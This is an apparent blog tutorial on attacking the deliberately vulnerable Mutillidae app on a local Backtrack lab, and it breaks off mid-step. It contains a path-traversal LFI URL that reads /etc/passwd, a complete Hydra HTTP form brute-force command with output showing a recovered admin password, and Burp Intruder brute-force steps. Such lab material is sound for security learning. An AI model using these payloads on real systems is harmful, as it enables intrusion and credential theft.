Privilege Escalation Mutillidae in Backtrack using Brute Force and LFI

Okay,,now we learn about privelege escalation. What is privelege escalation?

Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user.

There are two kinds of privilege escalation: Vertical and Horizontal.

• Vertical privilege escalation requires the attacker to grant himself higher privileges. This is typically achieved by performing kernel-level operations that allow the attacker to run unauthorized code.

• Horizontal privilege escalation requires the attacker to use the same level of privileges he already has been granted, but assume the identity of another user with similar privileges. For example, someone gaining access to another person's online banking account would constitute horizontal privilege escalation. 

One of the example of privelege escalation is brute force. Brute force (also known as brute force cracking) is a trial and error method used by application programs to decode encrypted data such as passwords or Data Encryption Standard (DES) keys, through exhaustive effort (using brute force) rather than employing intellectual strategies.   

What is LFI? A local file inclusion (usually called “LFI”) is a webhacking technique that allow simply to include files from a local location. That means that we can include a file that is outside of the web directory (if we got rights), and execute PHP code. 

Now i will show you Privilege Escalation Mutillidae in Backtrack using Brute Force and LFI, so you can try it yourself.


LFI (Local File Inclusion)

1. Open mutillidae from browser, you will see url bellow:
   

   http://localhost/mutillidae/index.php?page=home.php

2. The uri above "?page=home.php" indicate that this application try to read some file in local server. We can try to read other file in system, for example /etc/passwd
   

   http://localhost/mutillidae/index.php?page=../../../../../../etc/passwd

3. Wow, can you see that
   
   

Brute Force

1. Run your Hydra within this command:
   Usage
   

   hydra -> the progam name
   -l -> the username
   -P -> the wordlists
   127.0.0.1 -> your target host, it can be change using domain
   http-post-form -> the service module
   "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"
   
   /mutillidae/index.php?page=login.php -> path application
   username -> input form
   password -> input form
   login-php-submit-button -> input form at submit button
   Not Logged In -> error message when the application failed to log in.

   
   Run this command
   
   

hydra -l admin -P pass.txt 127.0.0.1 http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"

1. Ok, the password found
   
   

   Hydra v7.1 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only
   
   Hydra (http://www.thc.org/thc-hydra) starting at 2012-09-15 12:51:15
   [DATA] 8 tasks, 1 server, 8 login tries (l:1/p:8), ~1 try per task
   [DATA] attacking service http-post-form on port 80
   [80][www-form] host: 127.0.0.1   login: admin   password: adminpass
   [STATUS] attack finished for 127.0.0.1 (waiting for children to finish)
   1 of 1 target successfuly completed, 1 valid password found
   Hydra (http://www.thc.org/thc-hydra) finished at 2012-09-15 12:51:16

 By the way, I will try to attack brute force using Burp Suite.

1. We need to configure network of our browser, in this case I assuming using firefox.
2. Clik Edit->Preferences->Select Advanced Tab->Select Network->Setting.
   Host : 127.0.0.1
   Port : 8080
   
   
3. Open Burp Suite, Start menu->Backtrack->Vulnerability Assesment->Web Vulnerabilty Assesment->Web Application Proxies->Burp Suite
4. Goto Proxy tab->Intercept tab and make sure that "intercept" is on
5. Go back into Firefox, open login page of Mutillidae

http://localhost/mutillidae/index.php?page=login.php

6. You will see the Burp Suite blinking at the taskbar
   
   
7. Go to Burp Suite window
   
   
8. Click forward button
9. Goto Mutillidae login page and fill username and password random (test only)
   for example I'm using user:pass and then click login. You will see burp suite blinking. Go back into burp suite window.
   
   
10. Click right on the raw column and select "send to intruder"
    
    
11. Go to Intruder tab,
    Block some text and click clear
    Select "Culster Bomb" for attack type
    
    
    
    
    
    
    
    
12. Still on Intruder tab, select Payload tab
    Select "1" at payload type, and add a username (you can add more than one username)
    
    
    Select "2" at payload set, and add lists of random password
    
    
13. Go to Burp Suite menu, select Intruder->Start Attack, and wait for brute force.
    If username and password cracked, you will see the result look like this...